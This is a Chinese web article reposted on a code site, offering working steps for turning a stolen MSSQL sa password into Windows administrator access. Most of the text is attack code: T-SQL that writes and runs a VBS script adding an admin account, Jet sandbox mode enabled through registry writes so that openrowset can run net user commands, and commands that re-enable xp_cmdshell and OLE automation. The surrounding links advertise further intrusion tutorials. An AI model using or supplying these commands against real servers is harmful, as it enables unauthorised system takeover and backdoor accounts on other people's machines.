当前位置: 代码网 > 服务器>网络安全>企业安全 > mssql SA权限最新利用方法

mssql SA权限最新利用方法

2008年10月08日 企业安全 我要评论
mssql SA权限最新利用方法 在获得SA密码后,往往因为服务器管理者或”前人”将net.exe和net1.exe被限制使用,无法添加管理员账号。我们知道VBS在活动目录(ADSI)部分有一个winnt对象,用来管理本地资... 08-10-08
在获得sa密码后,往往因为服务器管理者或”前人”将net.exe和net1.exe被限制使用,无法添加管理员账号。我们知道vbs在活动目录(adsi)部分有一个winnt对象,用来管理本地资源,利用它可以不依靠cmd等命令就能添加一个管理员,具体代码如下:以下是引用片段: set wsnetwork=createobject("ws c r i p t.network") os="winnt://"&wsnetwork.computername set ob=getobject(os) ’得到adsi接口,绑定 set oe=getobject(os&"/administrators,group") ’属性,admin组 set od=ob.create("user","test") ’建立用户 od.setpassword "1234" ’设置密码 od.setinfo ’保存 set of=getobject(os&"/test",user) ’得到用户 oe.add os&"/test" 将上面的代码保存为1.vbs,然后执行,命令为“cscript 1.vbs”,这样就会在系统添加一个系统名为test,密码为1234的用户。具体在查询分析器执行的代码如下:以下是引用片段: declare @o int, @f int, @t int, @ret int exec sp_oacreate ’scripting.filesystemobject’, @o out exec sp_oamethod @o, ’createtextfile’, @f out, ’c:\1.vbs’, 1 exec @ret = sp_oamethod @f, ’writeline’, null,’set wsnetwork=createobject ("ws c r i p t.network")’ exec @ret = sp_oamethod @f, ’writeline’, null,’os="winnt://"&wsnetwork. computername’ exec @ret = sp_oamethod @f, ’writeline’, null,’set ob=getobject(os)’ exec @ret = sp_oamethod @f, ’writeline’, null,’set oe=getobject (os&"/administrators,group")’ exec @ret = sp_oamethod @f, ’writeline’, null,’set od=ob.create ("user","test")’ exec @ret = sp_oamethod @f, ’writeline’, null,’od.setpassword "1234"’ exec @ret = sp_oamethod @f, ’writeline’, null,’od.setinfo ’ exec @ret = sp_oamethod @f, ’writeline’, null,’set of=getobject (os&"/test",user) ’ exec @ret = sp_oamethod @f, ’writeline’, null,’oe.add os&"/test"’ 执行完上面的语句,再执行下面这行代码,这行代码一定单独执行,不要与上面的放在一起执行,否则会提示“c:\1.vbs正被另一个程序运行”而无法成功添加用户: exec master..xp_cmdshell 'cscript c:\1.vbs' 如果系统用户没有添加成功,有可能是因为系统用户的密码1234的太简单,不符合服务器的复杂密码策略,可以考虑设置的复杂些,然后再测试一下。也可以使用echo将代码写到1.vbs中,代码格式为: exec master..xp_cmdshell 'echo set wsnetwork=createobject("ws c r i p t.network") >>1.vbs' 不过,不知道为什么所有带“&”字符的命令行都无法写入1.vbs,感兴趣的朋友可以尝试解决一下。使用jet沙盘模式,可以解决xp_cmdshell等存储过程和相关动态链接库带来的烦恼。出于安全原因,系统默认情况下沙盘模式未开启,这就需要xp_regwrite开启沙盘模式: exec master.dbo.xp_regwrite 'hkey_local_machine','software\microsoft\jet\4.0 \engines','sandboxmode','reg_dword',1 然后执行沙盘命令,在系统添加一个用户名为test,密码为1234的用户: select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows \system32\ias\ias.mdb','select shell("cmd.exe /c net user test 1234 /add")') select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows \system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup administrators test /add")') 不同的操作系统,路径也不一样,需要根据情况做修改: nt/2k: c:\winnt\system32\ xp/2003: c:\windows\system32\ 另外microsoft sql server2005在默认情况下,一些存储过程是关闭着的,需要命令打开:开启xp_cmdshell: exec sp_configure 'show advanced options', 1;reconfigure;exec sp_configure 'xp_cmdshell', 1;reconfigure; 开启'openrowset': exec sp_configure 'show advanced options', 1;reconfigure;exec sp_configure 'ad hoc distributed queries',1;reconfigure; 开启'sp_oacreate': exec sp_configure 'show advanced options', 1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;
(0)

相关文章:

  • MYSQL数据库注射精华

    MYSQL数据库注射精华

    MYSQL数据库注射精华 鄙人今天心血来潮突然想写篇文章,鄙人从来没写过文章,如果有错误的地方请多多指教. 本文需要有基础的SQL语句知识才可以更好的理解.建... [阅读全文]
  • 内网渗透——如何打开突破口

    内网渗透——如何打开突破口

    内网渗透——如何打开突破口 内网渗透的思想是源于特洛伊木马的思想---堡垒最容易从内部攻破,一个大型的网站,一个大型的公司,一个大型的目标,在外肉,管理员总会... [阅读全文]
  • 网站脚本注入检测如何绕过限制

    网站脚本注入检测如何绕过限制

    网站脚本注入检测如何绕过限制 突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’... [阅读全文]
  • 菜鸟拿WebShell的经验

    菜鸟拿WebShell的经验

    菜鸟拿WebShell的经验 通过几次成功的拿Webshell,发现自己有时也走了一些弯路,为了避免其他的朋友再在困惑中迷失方向,现在我将自己的一些经验写出来... [阅读全文]
  • UPDATE注射的两个基本模式

    UPDATE注射的两个基本模式

    UPDATE注射的两个基本模式 一.测试环境: OS: Windowsxp sp2 php: php 4.3.10 ( mysql 4.1.9 apache ... [阅读全文]
  • 黑客如何破坏杀毒软件

    黑客如何破坏杀毒软件

    黑客如何破坏杀毒软件 最近有调查报告显示,知名品牌的杀毒软件对新型计算机病毒的查杀率只有20%,而漏杀率却高达80%。那么是什么原因造成这种状况的?到底是如今... [阅读全文]

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com